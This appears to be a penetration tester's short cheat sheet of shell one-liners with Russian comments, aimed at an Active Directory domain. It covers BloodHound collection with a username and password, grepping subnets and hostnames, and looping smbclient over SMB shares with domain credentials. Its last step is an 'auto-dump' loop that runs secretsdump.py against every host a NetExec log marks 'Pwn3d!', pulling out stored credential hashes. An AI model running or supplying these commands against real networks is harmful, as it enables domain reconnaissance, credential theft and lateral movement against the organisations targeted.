# bloodhound
pip install bloodhound
bloodhound-python -c all -d domain.ru -u user -p 'qwerty1234'


# копирование файлов
find . -name '*.rsc' -exec cp -b "{}" ./dirictory/ \;

# греп подсетей
cat ./* | grep -oP '[\d]+.[\d]+.[\d]+.[\d]+/[\d]+' | sort -V | uniq

#греп доменных имен и ipv4
cat ./* | grep -oP '([0-9a-zA-Z-_]+\.)+[0-9a-zA-Z-_]+' | sort -V | uniq

# просмотр всех шар
for i in $(bshm use net/smb/nxc-parser -f ./shares_user.txt --item 7 --ge print IPC); do echo -E $i; smbclient $i  -U 'domain\user%pass'; echo;  done

# Автодамп по кредам
for i in $(shm use ad/smb/xnxc -f #NXC-ЛОГ-С-КРЕДАМИ# --item 6 --gi '(Pwn3d!)'); do secretsdump.py -outputfile ${i##*@} $i; done